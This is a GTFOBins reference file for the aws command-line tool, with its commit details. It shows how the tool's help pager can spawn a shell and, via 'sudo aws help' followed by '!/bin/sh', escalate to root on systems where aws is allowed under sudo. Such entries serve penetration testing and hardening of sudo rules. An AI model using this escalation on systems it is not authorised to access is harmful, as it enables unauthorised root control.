GTFOBins.github.io/_gtfobins/aws.md
Yuta Yamate 18774ef89a
Add aws
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-12-16 11:58:13 +01:00

14 lines
391 B
Markdown

---
functions:
shell:
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
aws help
!/bin/sh
sudo:
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
sudo aws help
!/bin/sh
---